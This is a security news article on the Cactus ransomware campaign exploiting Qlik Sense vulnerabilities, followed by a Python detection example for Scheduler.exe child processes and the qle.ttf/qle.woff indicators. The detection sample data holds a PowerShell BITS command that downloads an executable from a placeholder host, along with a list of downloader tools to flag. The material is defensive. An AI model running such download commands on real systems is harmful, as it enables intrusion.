In an ongoing campaign that began in November, actors associated with the Cactus ransomware group are exploiting three vulnerabilities in the Qlik Sense data visualization platform to deploy ransomware, and researchers warn that there are thousands of vulnerable instances online at the moment.
The first indications of the activity emerged in November, when researchers observed attackers targeting the Qlik Sense vulnerabilities (CVE-2023-41265, CVE-2023-41266, and CVE-2023-48365) in sporadic attacks. Qlik had released patches for the Qlik Sense bugs in August, after researchers with Praetorian disclosed them to the vendor. Three months later, the Cactus ransomware attacks began, and they all followed a similar pattern, from intrusion to deployment of post-exploitation tools to deployment of the ransomware itself.
“Following exploitation of Qlik Sense installations, the observed execution chain was consistent between all intrusions identified and involves the Qlik Sense Scheduler service (Scheduler.exe) spawning uncommon processes. The threat actors leveraged PowerShell and the Background Intelligent Transfer Service (BITS) to download additional tools to establish persistence and ensure remote control,” an analysis by Arctic Wolf from November says.
Among the tools the actors downloaded were ManageEngine UEMS, AnyDesk, and PuTTY Link. The attackers also disabled some security applications, changed admin passwords on compromised systems, and set up an RDP tunnel, which they used for lateral movement. Researchers say the attackers are also feeding victims false information about how the intrusions occurred, in an effort to confuse them.
“Since November 2023, the Cactus ransomware group has been actively targeting vulnerable Qlik Sense servers. These attacks are not just about exploiting software vulnerabilities; they also involve a psychological component where Cactus misleads its victims with fabricated stories about the breach. This likely is part of their strategy to obscure their actual method of entry, thus complicating mitigation and response efforts for the affected organizations,” Willem Zeeman and Yun Zheng Hu of Fox IT said in a new analysis of the Cactus ransomware campaign.
Based on a scan from April 17, the Fox IT researchers identified more than 3,100 Qlik Sense servers that are vulnerable to the exploits used by the Cactus ransomware actors. The largest number of vulnerable servers are in the United States.
Cactus is a relatively young ransomware group, having emerged in early 2023. The group has typically exploited bugs in VPN appliances, along with the Qlik Sense servers, to gain initial access to a network. The highest-profile intrusion on the group’s scorecard is an attack on Schneider Electric in January.
Organizations running potentially vulnerable Qlik Sense instances can check for the presence of two font files, qle.ttf and qle.woff, as indicators of compromise. The attackers use those files, which are not part of the default installation of the server, to store command output.
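As an added detection example (not code from the Arctic Wolf or Fox IT reports), the following flags the two behaviours described above over constructed, Sysmon-style process-creation records: the Qlik Sense Scheduler service (Scheduler.exe) spawning PowerShell or BITS processes, and the presence of the qle.ttf / qle.woff artefact file names. The Sysmon field names, the Qlik install paths, the empty child-process baseline and the sample records are all assumptions, not details from the article.

```python
import ntpath
from typing import Iterable

# Assumed baseline: children the Scheduler service is allowed to spawn in your
# environment. The article gives no such list; start empty and tune from your telemetry.
EXPECTED_SCHEDULER_CHILDREN: set[str] = set()
# Downloaders named in the reporting: PowerShell and BITS (bitsadmin.exe is the BITS CLI).
DOWNLOADER_CHILDREN = {"powershell.exe", "pwsh.exe", "bitsadmin.exe"}
# Font-named files the actors use to store command output (from the Fox IT analysis).
ARTEFACT_NAMES = {"qle.ttf", "qle.woff"}

def scheduler_spawns(events: Iterable[dict]) -> list[dict]:
    """Return process-creation events whose parent is Scheduler.exe and whose child is
    not in the baseline. Events use Sysmon-style keys (ParentImage, Image, CommandLine);
    that naming is an assumption for this example."""
    hits = []
    for ev in events:
        parent = ntpath.basename(ev.get("ParentImage", "")).lower()
        child = ntpath.basename(ev.get("Image", "")).lower()
        if parent != "scheduler.exe" or child in EXPECTED_SCHEDULER_CHILDREN:
            continue
        cmd = ev.get("CommandLine", "").lower()
        if child in DOWNLOADER_CHILDREN or "bitstransfer" in cmd or "bitsadmin" in cmd:
            reason = "scheduler spawned PowerShell/BITS downloader"
        else:
            reason = "scheduler spawned uncommon child"
        hits.append({"child": child, "reason": reason, "command": ev.get("CommandLine", "")})
    return hits

def artefact_files(paths: Iterable[str]) -> list[str]:
    """Return every path whose file name matches the qle.ttf / qle.woff indicator."""
    return [p for p in paths if ntpath.basename(p).lower() in ARTEFACT_NAMES]

# Constructed sample telemetry; install paths and URL are placeholders, not from the article.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Start-BitsTransfer -Source http://example.invalid/t -Destination C:\\Windows\\Temp\\t.exe"},
    {"ParentImage": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c dir"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Program Files\Qlik\Sense\Scheduler\Scheduler.exe", "CommandLine": "Scheduler.exe"},
]
SAMPLE_PATHS = [
    r"C:\Program Files\Qlik\Sense\Repository\Content\Default\qle.ttf",
    r"C:\Program Files\Qlik\Sense\Client\fonts\qlikview.woff",  # legitimate-looking font, no match
    r"C:\ProgramData\Qlik\Sense\Repository\Content\QLE.WOFF",   # case differs, still a match
]

if __name__ == "__main__":
    for hit in scheduler_spawns(SAMPLE_EVENTS):
        print(f"[ALERT] {hit['reason']}: {hit['command']}")
    for path in artefact_files(SAMPLE_PATHS):
        print(f"[IOC]   artefact present: {path}")
```

Because the files are a filesystem artefact rather than a process event, the two checks are complementary: the first can only fire while the spawn is logged, the second still works on a server that has since been patched.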
“When the indicator of compromise artefact is present on a remote Qlik Sense server, it can imply various scenarios. Firstly, it may suggest that remote code execution was carried out on the server, followed by subsequent patching to address the vulnerability (if the server is not vulnerable anymore). Alternatively, its presence could signify a leftover artefact from a previous security incident or unauthorised access,” the Fox IT analysis says.